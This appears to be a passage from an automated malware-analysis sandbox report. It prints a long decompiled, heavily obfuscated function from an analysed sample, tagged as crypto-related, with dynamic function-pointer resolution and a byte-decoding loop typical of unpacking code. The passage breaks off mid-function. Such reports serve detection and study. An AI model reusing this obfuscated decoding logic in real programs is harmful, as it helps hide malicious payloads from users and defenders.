Instruction Fuzzy Hash: C6318172504500EFFF119F64DC85B5A7BF2EF84712F1980B9ED889D09BC77015689B2A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B3111C, Relevance: 2.7, Strings: 1, Instructions: 1484
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00B3111C(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _t781;
				signed int _t785;
				void* _t787;
				signed int _t788;
				signed int _t789;
				signed char _t792;
				signed int _t796;
				void* _t798;
				signed int _t799;
				signed int _t800;
				void* _t802;
				void* _t804;
				signed int _t805;
				signed int _t806;
				signed int _t808;
				void* _t810;
				signed int _t811;
				signed int _t814;
				void* _t815;
				signed int _t816;
				void* _t817;
				intOrPtr _t822;
				intOrPtr _t828;
				signed int _t832;
				void* _t834;
				signed int _t837;
				signed int _t839;
				void* _t841;
				signed int _t842;
				signed int _t844;
				void* _t846;
				signed int _t852;
				void* _t854;
				signed int _t855;
				void* _t857;
				void* _t859;
				void* _t861;
				signed int _t865;
				signed int _t866;
				signed int _t869;
				void* _t871;
				void* _t872;
				signed int _t874;
				signed int _t875;
				void* _t878;
				void* _t880;
				signed int _t881;
				signed int _t882;
				void* _t884;
				void* _t886;
				signed int _t887;
				signed int _t892;
				void* _t894;
				void* _t895;
				signed int _t898;
				void* _t900;
				void* _t901;
				signed int _t902;
				intOrPtr _t903;
				signed int _t907;
				void* _t909;
				void* _t910;
				signed int _t914;
				void* _t916;
				void* _t917;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t930;
				signed int _t936;
				void* _t938;
				intOrPtr _t939;
				void* _t942;
				void* _t944;
				signed int _t945;
				signed int _t948;
				signed int _t951;
				signed int _t952;
				signed int _t958;
				signed int _t960;
				signed int _t962;
				signed int _t966;
				signed int _t969;
				signed int _t971;
				signed int _t974;
				signed int _t975;
				signed int _t978;
				signed int _t979;
				void* _t981;
				void* _t983;
				signed int _t984;
				signed int _t985;
				signed int _t987;
				void* _t989;
				signed int _t990;
				signed int _t995;
				signed int _t1001;
				signed int _t1004;
				signed int _t1007;
				signed int _t1014;
				void* _t1015;
				void* _t1017;
				signed int _t1020;
				signed int _t1022;
				signed int _t1025;
				signed int _t1027;
				signed int _t1030;
				signed int _t1031;
				signed int _t1037;
				signed int _t1040;
				signed int _t1044;
				signed int _t1049;
				signed int _t1054;
				signed int _t1056;
				signed int _t1067;
				signed int _t1069;
				signed int _t1071;
				void* _t1079;
				signed int _t1084;
				signed int _t1086;
				signed int _t1088;
				signed int _t1090;
				void* _t1093;
				signed int _t1098;
				signed int _t1102;
				signed int _t1104;
				signed int _t1106;
				signed int _t1113;
				signed int _t1117;
				signed int _t1121;
				signed int _t1123;
				signed int _t1125;
				signed int _t1135;
				signed int _t1139;
				signed int _t1140;
				signed int _t1146;
				signed char _t1149;
				signed int _t1151;
				signed int _t1154;
				signed int _t1165;
				void* _t1166;
				signed int _t1168;
				signed int _t1171;
				signed int _t1174;
				signed int _t1177;
				signed int _t1180;
				signed int _t1183;
				signed int _t1201;
				void* _t1202;
				signed int _t1204;
				signed int _t1207;
				signed int _t1211;
				signed int _t1213;
				signed int _t1215;
				signed int _t1218;
				signed int _t1221;
				void* _t1222;
				void* _t1224;
				void* _t1227;
				signed int _t1236;
				signed int _t1239;
				signed int _t1241;
				signed int _t1244;
				void* _t1245;
				signed int _t1247;
				signed int _t1250;
				void* _t1257;
				signed int _t1264;
				signed int _t1269;
				signed int _t1271;
				signed int _t1272;
				signed int _t1274;
				signed int _t1294;
				signed int _t1302;
				signed int _t1307;
				signed int _t1319;
				void* _t1324;
				void* _t1326;
				signed int _t1333;
				signed int* _t1334;
				signed int* _t1335;
				signed int* _t1336;
				signed int* _t1337;
				signed int* _t1338;
				signed int* _t1339;
				signed int* _t1342;
				signed int* _t1343;
				signed int* _t1344;
				signed int* _t1345;
				signed int* _t1346;
				signed int _t1347;
				signed int* _t1348;
				signed int* _t1349;
				signed int* _t1350;
				signed int* _t1351;
				signed int* _t1352;
				signed int* _t1354;
				signed int* _t1355;
				signed int* _t1356;
				signed int* _t1357;

				_t1269 = __esi;
				_t1139 = __edx;
				_t1031 = __ecx;
				_t1319 = _t1333;
				_t1334 = _t1333 + 0xffffffe4;
				 *_t1334 =  *_t1334 & 0x00000000;
				 *_t1334 =  *_t1334 | __ebx;
				_v32 = __ebx;
				_t1211 = 0 ^ _a8;
				_t1001 = _v32;
				_push( *((intOrPtr*)(_t1211 + 0xc)));
				_pop( *_t5);
				_push( *((intOrPtr*)(_t1211 + 4)));
				_pop( *_t7);
				if(_v28 == 1) {
					_v12 = 7;
					_v8 = 1;
					_v20 = 8;
				}
				if(_v28 != 0) {
					if(_v28 != 2) {
						if(_v28 == 4) {
							if( *(_t1001 + 0x45f02b) == 0) {
								_t837 =  *((intOrPtr*)(_t1001 + 0x460024))(_t1319);
								_v32 = _t1269;
								 *(_t1001 + 0x45f02b) =  *(_t1001 + 0x45f02b) & 0x00000000;
								 *(_t1001 + 0x45f02b) =  *(_t1001 + 0x45f02b) | _t1269 & 0x00000000 ^ _t837;
								_t1269 = _v32;
							}
							_v12 = 1;
							_v8 = 0x55;
							_t567 = _t1001 + 0x45f3d0; // 0x8bef48
							 *_t1334 =  *_t1334 ^ _t1269;
							 *_t1334 =  *_t1334 + _t567;
							_t832 =  *((intOrPtr*)(_t1001 + 0x460028))(_t1269);
							 *_t1334 =  *_t1334 ^ _t1031;
							 *_t1334 = _t832;
							_t569 = _t1001 + 0x45f0f1; // 0x8bec69
							 *_t1334 =  *_t1334 ^ _t1001;
							 *_t1334 =  *_t1334 + _t569;
							_t834 =  *((intOrPtr*)(_t1001 + 0x460028))(_t1001, _t1031);
							_t1067 =  *_t1334;
							_t1334 = _t1334 - 0xfffffffc;
							 *_t571 = _t834;
							_v32 = _v32 + _t1067;
							_push(_v32);
							_pop(_t781);
							_t1269 = _t1269;
							_push( *((intOrPtr*)(_t1001 + 0x45feed)));
							_pop( *_t576);
							_push(_v32);
							_pop(_t1031);
							if(_t1031 > _t781) {
								_t578 = _t1001 + 0x45f3d0; // 0x8bef48
								 *_t1334 =  *_t1334 & 0x00000000;
								 *_t1334 =  *_t1334 | _t578;
								_t579 = _t1001 + 0x45f0f1; // 0x8bec69
								 *_t1334 =  *_t1334 ^ _t1269;
								 *_t1334 =  *_t1334 | _t579;
								_t781 =  *((intOrPtr*)(_t1001 + 0x46002c))(_t1269, _t1319);
							}
							 *_t1334 = _t1139;
							 *(_t1001 + 0x45f3a7) = 0 ^ _t781;
							_t1139 = 0;
							_v20 = 2;
							if( *(_t1001 + 0x45fce8) == 0) {
								_t781 =  *((intOrPtr*)(_t1001 + 0x460024))( *((intOrPtr*)(_t1001 + 0x45f5b1)));
								 *(_t1001 + 0x45fce8) =  *(_t1001 + 0x45fce8) & 0x00000000;
								 *(_t1001 + 0x45fce8) =  *(_t1001 + 0x45fce8) ^ _t1269 & 0x00000000 ^ _t781;
								_t1269 = _t1269;
							}
						}
					} else {
						_t510 = _t1001 + 0x45f526; // 0x8beca4
						_v32 = 0;
						 *_t1334 =  *_t1334 | _t510;
						_t839 =  *((intOrPtr*)(_t1001 + 0x460028))(_v32);
						_v32 = _v32 & 0x00000000;
						 *_t1334 =  *_t1334 ^ _t839;
						_t517 = _t1001 + 0x45f4b5; // 0x8bec33
						_v32 = 0;
						 *_t1334 =  *_t1334 + _t517;
						_t841 =  *((intOrPtr*)(_t1001 + 0x460028))(_v32, _v32);
						_t1069 = 0 ^  *_t1334;
						_t1342 = _t1334 - 0xfffffffc;
						_v32 = _t1211;
						_push(_t1069 + _t841);
						_t1211 = _v32;
						_pop(_t842);
						_t1071 = _t1069 & 0x00000000 | _t1269 -  *_t1342 |  *(_t1001 + 0x45f516);
						_t1294 = _t1269;
						if(_t1071 > _t842) {
							_t524 = _t1001 + 0x45f526; // 0x8beca4
							_v32 = 0;
							 *_t1342 =  *_t1342 ^ _t524;
							_t527 = _t1001 + 0x45f4b5; // 0x8bec33
							_v32 = _v32 & 0x00000000;
							 *_t1342 =  *_t1342 | _t527;
							_t842 =  *((intOrPtr*)(_t1001 + 0x46002c))(_v32, _v32);
						}
						_v32 = _t1294;
						 *(_t1001 + 0x45f762) = 0 ^ _t842;
						_v12 = 3;
						_v8 = 0x11;
						_t537 = _t1001 + 0x45f6e1; // 0x8bee5f
						_v32 = _v32 & 0x00000000;
						 *_t1342 =  *_t1342 + _t537;
						_t844 =  *((intOrPtr*)(_t1001 + 0x460028))(_v32);
						 *_t1342 =  *_t1342 - _t1139;
						 *_t1342 =  *_t1342 ^ _t844;
						_t542 = _t1001 + 0x45f7e9; // 0x8bef67
						_v32 = 0;
						 *_t1342 =  *_t1342 + _t542;
						_t846 =  *((intOrPtr*)(_t1001 + 0x460028))(_v32, _t1139);
						_t1334 =  &(_t1342[1]);
						 *_t1334 =  *_t1334 ^ _t1319;
						_t1326 = _t846;
						_t781 = _t1326 + (_t1071 & 0x00000000) +  *_t1342;
						_t1319 = 0;
						 *_t1334 = _v32;
						_t1031 =  *(_t1001 + 0x45f0a7);
						_t1269 = 0;
						if(_t1031 > _t781) {
							_t547 = _t1001 + 0x45f6e1; // 0x8bee5f
							 *_t1334 =  *_t1334 ^ _t1031;
							 *_t1334 =  *_t1334 | _t547;
							_t548 = _t1001 + 0x45f7e9; // 0x8bef67
							 *_t1334 = _t548;
							_t781 =  *((intOrPtr*)(_t1001 + 0x46002c))(_v32, _t1031);
						}
						 *(_t1001 + 0x45f9b6) =  *(_t1001 + 0x45f9b6) & 0x00000000;
						 *(_t1001 + 0x45f9b6) =  *(_t1001 + 0x45f9b6) ^ (_t1139 -  *_t1334 | _t781);
						_t1139 = _t1139;
						_v20 = 4;
					}
					_t1140 = _t1139 ^ _t1139;
					_t1004 = _t1001;
					 *_t1334 = _t1140;
					_t592 = _t1004 + 0x45f39b; // 0x8bef13
					 *_t1334 =  *_t1334 & 0x00000000;
					 *_t1334 =  *_t1334 | _t592;
					_t785 =  *((intOrPtr*)(_t1004 + 0x460028))(_t1140, _v32, _t1031);
					_v32 = _v32 & 0x00000000;
					 *_t1334 =  *_t1334 ^ _t785;
					_t597 = _t1004 + 0x45fbbe; // 0x8bf736
					 *_t1334 =  *_t1334 ^ _t1004;
					 *_t1334 =  *_t1334 ^ _t597;
					_t787 =  *((intOrPtr*)(_t1004 + 0x460028))(_t1004, _v32);
					_t1335 = _t1334 - 0xfffffffc;
					 *_t599 = _t787;
					_v32 = _v32 +  *_t1334;
					_push(_v32);
					_pop(_t788);
					_t1213 = _t1211;
					_v32 = _t1140;
					_t1037 = 0 ^  *(_t1004 + 0x45fd62);
					if(_t1037 > _t788) {
						_t606 = _t1004 + 0x45f39b; // 0x8bef13
						 *_t1335 =  *_t1335 ^ _t1319;
						 *_t1335 =  *_t1335 ^ _t606;
						_t607 = _t1004 + 0x45fbbe; // 0x8bf736
						_v32 = _v32 & 0x00000000;
						 *_t1335 =  *_t1335 ^ _t607;
						_t788 =  *((intOrPtr*)(_t1004 + 0x46002c))(_v32, _t1319);
						 *(_t1004 + 0x45fad0) =  *(_t1004 + 0x45fad0) & 0x00000000;
						 *(_t1004 + 0x45fad0) =  *(_t1004 + 0x45fad0) | _t1269 & 0x00000000 ^ _t788;
						_t1269 = _t1269;
					}
					_t1336 =  &(_t1335[1]);
					_t789 = _t788 / _v20;
					_t1146 = _t788 % _v20;
					if( *(_t1004 + 0x45ff01) == 0) {
						_v32 = 0;
						 *_t1336 =  *_t1336 | _t1146;
						 *_t1336 =  *_t1336 - _t1037;
						 *_t1336 =  *_t1336 | _t1213;
						_t789 =  *((intOrPtr*)(_t1004 + 0x460024))(_t1037, _v32);
						 *_t1336 = _t1269;
						 *(_t1004 + 0x45ff01) = 0 ^ _t789;
						_t1269 = 0;
						_t1146 =  *_t1336;
						_t1336 = _t1336 - 0xfffffffc;
					}
					_push(_v24);
					 *_t1336 =  *_t1336 - _t1146;
					_pop( *_t628);
					_v32 = _t789;
					_v16 = _t1146;
					_t792 = _v32;
					if( *(_t1004 + 0x45f05b) == 0) {
						_t792 =  *((intOrPtr*)(_t1004 + 0x460024))( *((intOrPtr*)(_t1004 + 0x45fa19)));
						_push(_t1037);
						 *(_t1004 + 0x45f05b) =  *(_t1004 + 0x45f05b) & 0x00000000;
						 *(_t1004 + 0x45f05b) =  *(_t1004 + 0x45f05b) | _t1037 -  *_t1336 | _t792;
					}
					_v32 = _t1004;
					_t1271 = _t1269 & 0x00000000 ^ _t1004 & 0x00000000 ^ _a4;
					_t1007 = _v32;
					_t1215 = _t1213 & 0x00000000 | _t1146 ^  *_t1336 | _t1271;
					_t1149 = _t1146;
					if( *(_t1007 + 0x45fd3a) == 0) {
						_t792 =  *((intOrPtr*)(_t1007 + 0x460024))(0x7c5);
						_v32 = _t1271;
						 *(_t1007 + 0x45fd3a) =  *(_t1007 + 0x45fd3a) & 0x00000000;
						 *(_t1007 + 0x45fd3a) =  *(_t1007 + 0x45fd3a) ^ _t1271 - _v32 ^ _t792;
						_t1271 = _v32;
					}
					_t1272 = _t1271 - 1;
					_v32 = 0;
					_push(_v32);
					 *_t1336 =  *_t1336 + _t1007;
					do {
						 *_t1336 = _t1319;
						_t1319 = 0;
						if((_t1215 & _v12) == 0) {
							_t1272 = _t1272 + 1;
							_v32 = _t1007;
							_t792 = _t792 & 0x00000000 | _t1007 ^ _v32 ^ _v20;
							_t1007 =  *(_t792 + _t1272) & 0x000000ff;
						}
						_v32 = _t1007;
						_t1151 = _t1149 & 0x00000000 ^ _t1007 - _v32 ^ _v8;
						_t1007 = _v32;
						asm("rol edx, cl");
						_t1149 = _t1151 & _t1007;
						asm("lodsb");
						_t792 = _t792 | _t1149;
						 *_t1215 = _t792;
						_t1215 = _t1215 + 1;
						_t663 =  &_v24;
						 *_t663 = _v24 - 1;
					} while ( *_t663 != 0);
					_t1014 =  *_t1336;
					_t1337 =  &(_t1336[1]);
					if( *((intOrPtr*)(_t1014 + 0x45f06b)) == 0) {
						_t828 =  *((intOrPtr*)(_t1014 + 0x460024))( *((intOrPtr*)(_t1014 + 0x45fa94)));
						_v32 = _t1215;
						 *((intOrPtr*)(_t1014 + 0x45f06b)) = _t828;
						_t1215 = _v32;
					}
					 *_t1337 =  *_t1337 - _t1272;
					 *_t1337 =  *_t1337 | _t1014 + 0x0045fd42;
					 *_t1337 =  *_t1337 & 0x00000000;
					 *_t1337 =  *_t1337 ^ _t1014 + 0x0045f4d8;
					_t796 =  *((intOrPtr*)(_t1014 + 0x460028))(_t1149, _t1272);
					 *_t1337 =  *_t1337 & 0x00000000;
					 *_t1337 =  *_t1337 ^ _t796;
					 *_t1337 = _t1014 + 0x45f424;
					_t798 =  *((intOrPtr*)(_t1014 + 0x460028))(_v32, _t1319);
					_pop( *_t677);
					_t1040 = _v32;
					 *_t1337 =  *_t1337 | _t1014;
					_t1015 = _t798;
					_t799 = _t1015 + _t1040;
					_t1017 = 0;
					_t1154 = _t1149;
					if((_t1040 & 0x00000000 | _t1149 -  *_t1337 ^  *(_t1017 + 0x45f00f)) > _t799) {
						_t680 = _t1017 + 0x45f4d8; // 0x45f4d8
						_v32 = _v32 & 0x00000000;
						 *_t1337 =  *_t1337 ^ _t680;
						_t684 = _t1017 + 0x45f424; // 0x45f424
						 *_t1337 =  *_t1337 & 0x00000000;
						 *_t1337 =  *_t1337 ^ _t684;
						_t799 =  *((intOrPtr*)(_t1017 + 0x46002c))(_t1272, _v32);
					}
					 *(_t1017 + 0x45f852) =  *(_t1017 + 0x45f852) & 0x00000000;
					 *(_t1017 + 0x45f852) =  *(_t1017 + 0x45f852) | _t1319 -  *_t1337 | _t799;
					_t1324 = _t1319;
					_t800 =  *((intOrPtr*)(_t1017 + 0x460028))();
					_v32 = 0;
					 *_t1337 =  *_t1337 ^ _t800;
					_t693 = _t1017 + 0x45f561; // 0x45f561
					_v32 = _v32 & 0x00000000;
					 *_t1337 =  *_t1337 ^ _t693;
					_t802 =  *((intOrPtr*)(_t1017 + 0x460028))(_v32, _v32);
					 *_t1337 =  *_t1337 - _t1324;
					 *_t1337 =  *_t1337 + _t802;
					_t698 = _t1017 + 0x45faa8; // 0x45faa8
					 *_t1337 = _t698;
					_t804 =  *((intOrPtr*)(_t1017 + 0x460028))(_v32, _t1324);
					_pop( *_t701);
					_t1044 = _v32;
					_v32 = _t1215;
					_push(_t1044 + _t804);
					_t1218 = _v32;
					_pop(_t805);
					_v32 = _t1218;
					_t1221 = _v32;
					if((_t1044 & 0x00000000 | _t1218 - _v32 |  *(_t1017 + 0x45f3cc)) > _t805) {
						_t709 = _t1017 + 0x45f561; // 0x45f561
						_v32 = 0;
						 *_t1337 =  *_t1337 + _t709;
						_t712 = _t1017 + 0x45faa8; // 0x45faa8
						_v32 = _v32 & 0x00000000;
						 *_t1337 =  *_t1337 | _t712;
						_t805 =  *((intOrPtr*)(_t1017 + 0x46002c))(_v32, _v32);
					}
					_v32 = _t1154;
					 *(_t1017 + 0x45ff38) =  *(_t1017 + 0x45ff38) & 0x00000000;
					 *(_t1017 + 0x45ff38) =  *(_t1017 + 0x45ff38) | _t1154 & 0x00000000 | _t805;
					_t723 = _t1017 + 0x45f65c; // 0x45f65c
					_t806 = _t723;
					if( *((intOrPtr*)(_t1017 + 0x45f324)) == 0) {
						_v32 = 0;
						 *_t1337 =  *_t1337 ^ _t806;
						_t822 =  *((intOrPtr*)(_t1017 + 0x460024))( *((intOrPtr*)(_t1017 + 0x45f807)), _v32);
						_v32 = _t1272;
						 *((intOrPtr*)(_t1017 + 0x45f324)) = _t822;
						_t1272 = _v32;
						_pop( *_t732);
						_t806 = 0 + _v32;
					}
					_v32 = _v32 & 0x00000000;
					 *_t1337 =  *_t1337 | _t806;
					_t737 = _t1017 + 0x45fcb6; // 0x45fcb6
					_v32 = 0;
					 *_t1337 =  *_t1337 ^ _t737;
					_t808 =  *((intOrPtr*)(_t1017 + 0x460028))(_v32, _v32);
					 *_t1337 =  *_t1337 & 0x00000000;
					 *_t1337 =  *_t1337 ^ _t808;
					_t741 = _t1017 + 0x45f6c8; // 0x45f6c8
					_v32 = _v32 & 0x00000000;
					 *_t1337 =  *_t1337 ^ _t741;
					_t810 =  *((intOrPtr*)(_t1017 + 0x460028))(_v32, _t1221);
					_t1338 = _t1337 - 0xfffffffc;
					 *_t746 = _t810;
					_v32 = _v32 +  *_t1337;
					_push(_v32);
					_pop(_t811);
					_t1274 = _t1272;
					_v32 = _t811;
					_t1049 = 0 ^  *(_t1017 + 0x45fee5);
					_t814 = _v32;
					if(_t1049 > _t814) {
						_t753 = _t1017 + 0x45fcb6; // 0x45fcb6
						_v32 = 0;
						 *_t1338 =  *_t1338 ^ _t753;
						_t756 = _t1017 + 0x45f6c8; // 0x45f6c8
						 *_t1338 =  *_t1338 & 0x00000000;
						 *_t1338 =  *_t1338 | _t756;
						_t814 =  *((intOrPtr*)(_t1017 + 0x46002c))(_t1324, _v32);
					}
					 *(_t1017 + 0x45f637) =  *(_t1017 + 0x45f637) & 0x00000000;
					 *(_t1017 + 0x45f637) =  *(_t1017 + 0x45f637) | _t1049 & 0x00000000 | _t814;
					_t815 =  *((intOrPtr*)(_t1017 + 0x460028))(_t1049);
					_t1054 =  *_t1338;
					_t1339 =  &(_t1338[1]);
					 *_t1339 =  *_t1339 | _t1221;
					_t1222 = _t815;
					_t816 = _t1222 + _t1054;
					_t1224 = 0;
					_t1056 = _t1054 & 0x00000000 ^ _t1224 -  *_t1339 ^  *(_t1017 + 0x45f000);
					_t1227 = _t1224;
					if(_t1056 > _t816) {
						_t764 = _t1017 + 0x45fd42; // 0x45fd42
						 *_t1339 = _t764;
						_t766 = _t1017 + 0x45f65c; // 0x45f65c
						 *_t1339 =  *_t1339 & 0x00000000;
						 *_t1339 =  *_t1339 + _t766;
						_t816 =  *((intOrPtr*)(_t1017 + 0x46002c))(_t1056, _v32);
					}
					_v32 = _t1056;
					 *(_t1017 + 0x45f1e8) =  *(_t1017 + 0x45f1e8) & 0x00000000;
					 *(_t1017 + 0x45f1e8) =  *(_t1017 + 0x45f1e8) ^ _t1056 - _v32 ^ _t816;
					_v32 = _t1274;
					_t817 = memcpy(_t1227, _v32 + 1, _v32 & 0x00000000 ^ (_t1274 ^ _v32 | _v16));
					_pop( *_t779);
					return _t817;
				} else {
					_t1020 =  *_t1334;
					_t1343 =  &(_t1334[1]);
					_t13 = _t1020 + 0x45f41b; // 0x45f41b
					_v32 = 0;
					 *_t1343 =  *_t1343 ^ _t13;
					_t852 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32);
					 *_t1343 =  *_t1343 & 0x00000000;
					 *_t1343 =  *_t1343 ^ _t852;
					_t17 = _t1020 + 0x45fa68; // 0x45fa68
					_v32 = 0;
					 *_t1343 =  *_t1343 ^ _t17;
					_t854 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32, _t1031);
					_t1344 =  &(_t1343[1]);
					_v32 = _t1211;
					_push( *_t1343 + _t854);
					_t1236 = _v32;
					_pop(_t855);
					 *_t1344 = _t1139;
					_t1165 = 0;
					if( *((intOrPtr*)(_t1020 + 0x45fae4)) > _t855) {
						_t24 = _t1020 + 0x45f41b; // 0x45f41b
						_v32 = _v32 & 0x00000000;
						 *_t1344 =  *_t1344 + _t24;
						_t28 = _t1020 + 0x45fa68; // 0x45fa68
						_v32 = _v32 & 0x00000000;
						 *_t1344 =  *_t1344 + _t28;
						_t855 =  *((intOrPtr*)(_t1020 + 0x46002c))(_v32, _v32);
					}
					 *(_t1020 + 0x45f7ff) =  *(_t1020 + 0x45f7ff) & 0x00000000;
					 *(_t1020 + 0x45f7ff) =  *(_t1020 + 0x45f7ff) | _t1236 & 0x00000000 | _t855;
					_t1239 = _t1236;
					if( *(_t1020 + 0x45f330) == 0) {
						if( *(_t1020 + 0x45f6dd) == 0) {
							_t995 =  *((intOrPtr*)(_t1020 + 0x460024))( *((intOrPtr*)(_t1020 + 0x45f8a4)));
							_v32 = _t1239;
							 *(_t1020 + 0x45f6dd) = 0 ^ _t995;
							_t1239 = _v32;
						}
						_t44 = _t1020 + 0x45f5a3; // 0x45f5a3
						_v32 = _v32 & 0x00000000;
						 *_t1344 =  *_t1344 | _t44;
						_t981 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32, 0xffffffff);
						_v32 = 0;
						 *_t1344 =  *_t1344 + _t981;
						_t51 = _t1020 + 0x45f21e; // 0x45f21e
						_v32 = 0;
						 *_t1344 =  *_t1344 + _t51;
						_t983 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32, _v32);
						_t1357 =  &(_t1344[1]);
						_v32 = _t1165;
						_push( *_t1344 + _t983);
						_t1201 = _v32;
						_pop(_t984);
						_push( *((intOrPtr*)(_t1020 + 0x45fec5)));
						_pop( *_t58);
						_push(_v32);
						_pop(_t1135);
						if(_t1135 > _t984) {
							_t60 = _t1020 + 0x45f5a3; // 0x45f5a3
							 *_t1357 = _t60;
							_t62 = _t1020 + 0x45f21e; // 0x45f21e
							 *_t1357 = _t62;
							_t984 =  *((intOrPtr*)(_t1020 + 0x46002c))(_v32, _v32);
						}
						_v32 = _t1239;
						 *(_t1020 + 0x45fcc9) =  *(_t1020 + 0x45fcc9) & 0x00000000;
						 *(_t1020 + 0x45fcc9) =  *(_t1020 + 0x45fcc9) | _t1239 & 0x00000000 | _t984;
						_t1264 = _v32;
						_t985 =  *((intOrPtr*)(_t1020 + 0x460024))();
						_v32 = _t1264;
						 *(_t1020 + 0x45f330) =  *(_t1020 + 0x45f330) & 0x00000000;
						 *(_t1020 + 0x45f330) =  *(_t1020 + 0x45f330) | _t1264 - _v32 ^ _t985;
						_t1239 = _v32;
						_t79 = _t1020 + 0x45f61c; // 0x45f61c
						_v32 = 0;
						 *_t1357 =  *_t1357 ^ _t79;
						_t987 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32);
						 *_t1357 =  *_t1357 ^ _t1239;
						 *_t1357 = _t987;
						_t83 = _t1020 + 0x45fc66; // 0x45fc66
						 *_t1357 =  *_t1357 - _t1319;
						 *_t1357 =  *_t1357 | _t83;
						_t989 =  *((intOrPtr*)(_t1020 + 0x460028))(_t1319, _t1239);
						_t1344 =  &(_t1357[1]);
						 *_t1344 =  *_t1344 + _t1201;
						_t1202 = _t989;
						_t990 = _t1202 + (_t1135 & 0x00000000 ^  *_t1357);
						_t1204 = 0;
						_v32 = _t1204;
						_t1207 = _v32;
						if((0 ^  *(_t1020 + 0x45f8c1)) > _t990) {
							_t88 = _t1020 + 0x45f61c; // 0x45f61c
							 *_t1344 = _t88;
							_t90 = _t1020 + 0x45fc66; // 0x45fc66
							_v32 = 0;
							 *_t1344 =  *_t1344 | _t90;
							_t990 =  *((intOrPtr*)(_t1020 + 0x46002c))(_v32, _v32);
						}
						_v32 = _t1207;
						 *(_t1020 + 0x45f443) = 0 ^ _t990;
						_t1165 = _v32;
					}
					_t97 = _t1020 + 0x45f0ca; // 0x45f0ca
					_v32 = _v32 & 0x00000000;
					_push(_v32);
					 *_t1344 =  *_t1344 | _t97;
					if( *(_t1020 + 0x45f274) == 0) {
						_t979 =  *((intOrPtr*)(_t1020 + 0x460024))(0xfffffab5);
						_v32 = _t1165;
						 *(_t1020 + 0x45f274) =  *(_t1020 + 0x45f274) & 0x00000000;
						 *(_t1020 + 0x45f274) =  *(_t1020 + 0x45f274) ^ _t1165 - _v32 ^ _t979;
						_t1165 = _v32;
					}
					if( *(_t1020 + 0x45fb5d) == 0) {
						if( *(_t1020 + 0x45f6e9) == 0) {
							_t978 =  *((intOrPtr*)(_t1020 + 0x460024))(0xffffffff);
							 *(_t1020 + 0x45f6e9) =  *(_t1020 + 0x45f6e9) & 0x00000000;
							 *(_t1020 + 0x45f6e9) =  *(_t1020 + 0x45f6e9) ^ _t1269 & 0x00000000 ^ _t978;
							_t1269 = _t1269;
						}
						_v32 = _v32 & 0x00000000;
						 *_t1344 =  *_t1344 ^ _t1269;
						_t975 =  *((intOrPtr*)(_t1020 + 0x460024))(_v32);
						if( *((intOrPtr*)(_t1020 + 0x45fabd)) == 0) {
							_v32 = 0;
							 *_t1344 =  *_t1344 | _t975;
							_push( *((intOrPtr*)(_t1020 + 0x460024))(0xfffffd91, _v32));
							_pop( *_t125);
							_push(_v32);
							_pop( *_t127);
							_t975 =  *_t1344;
							_t1344 =  &(_t1344[1]);
						}
						 *(_t1020 + 0x45fb5d) =  *(_t1020 + 0x45fb5d) & 0x00000000;
						 *(_t1020 + 0x45fb5d) =  *(_t1020 + 0x45fb5d) ^ _t1269 & 0x00000000 ^ _t975;
						_t1269 = _t1269;
					}
					_t857 =  *((intOrPtr*)(_t1020 + 0x460028))();
					_v32 = 0;
					 *_t1344 =  *_t1344 + _t857;
					_t135 = _t1020 + 0x45f23a; // 0x45f23a
					_v32 = 0;
					 *_t1344 =  *_t1344 + _t135;
					_t859 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32, _v32);
					 *_t1344 =  *_t1344 & 0x00000000;
					 *_t1344 =  *_t1344 + _t859;
					_t139 = _t1020 + 0x45f935; // 0x45f935
					 *_t1344 = _t139;
					_t861 =  *((intOrPtr*)(_t1020 + 0x460028))(_v32, _t1020);
					_t1345 =  &(_t1344[1]);
					 *_t1345 = _t1165;
					_t1166 = _t861;
					_t1168 = 0;
					_push( *((intOrPtr*)(_t1020 + 0x45fdb6)));
					_pop( *_t143);
					_push(_v32);
					_pop(_t1079);
					if(_t1079 > _t1166 +  *_t1344) {
						_t145 = _t1020 + 0x45f23a; // 0x45f23a
						 *_t1345 = _t145;
						_t147 = _t1020 + 0x45f935; // 0x45f935
						 *_t1345 =  *_t1345 - _t1269;
						 *_t1345 = _t147;
						_t974 =  *((intOrPtr*)(_t1020 + 0x46002c))(_t1269, _v32);
						 *(_t1020 + 0x45f256) =  *(_t1020 + 0x45f256) & 0x00000000;
						 *(_t1020 + 0x45f256) =  *(_t1020 + 0x45f256) | _t1168 ^  *_t1345 ^ _t974;
						_t1168 = _t1168;
					}
					_t1346 = _t1345 - 0xfffffffc;
					_v32 = 0;
					_push(_v32);
					 *_t1346 =  *_t1346 |  *_t1345;
					if( *(_t1020 + 0x45f898) == 0) {
						_t971 =  *((intOrPtr*)(_t1020 + 0x460024))( *((intOrPtr*)(_t1020 + 0x45f9e9)));
						_v32 = _t1168;
						 *(_t1020 + 0x45f898) =  *(_t1020 + 0x45f898) & 0x00000000;
						 *(_t1020 + 0x45f898) =  *(_t1020 + 0x45f898) | _t1168 ^ _v32 | _t971;
						_t1168 = _v32;
					}
					_t165 = _t1020 + 0x45f073; // 0x45f073
					_t865 = _t165;
					if( *((intOrPtr*)(_t1020 + 0x45f1f0)) == 0) {
						 *_t1346 =  *_t1346 ^ _t1168;
						 *_t1346 = _t865;
						_t969 =  *((intOrPtr*)(_t1020 + 0x460024))(_t1168);
						 *_t168 = _t969;
						_push(_v32);
						_pop( *_t170);
						 *_t171 = 0;
						_t865 = (_t969 & 0x00000000) + _v32;
					}
					 *_t1346 =  *_t1346 & 0x00000000;
					 *_t1346 =  *_t1346 | _t865;
					_t866 =  *((intOrPtr*)(_t1020 + 0x460028))(_t1319);
					if( *((intOrPtr*)(_t1020 + 0x45fac8)) == 0) {
						 *_t1346 =  *_t1346 - _t1079;
						 *_t1346 =  *_t1346 | _t866;
						_v32 = _v32 & 0x00000000;
						 *_t1346 =  *_t1346 + _t1239;
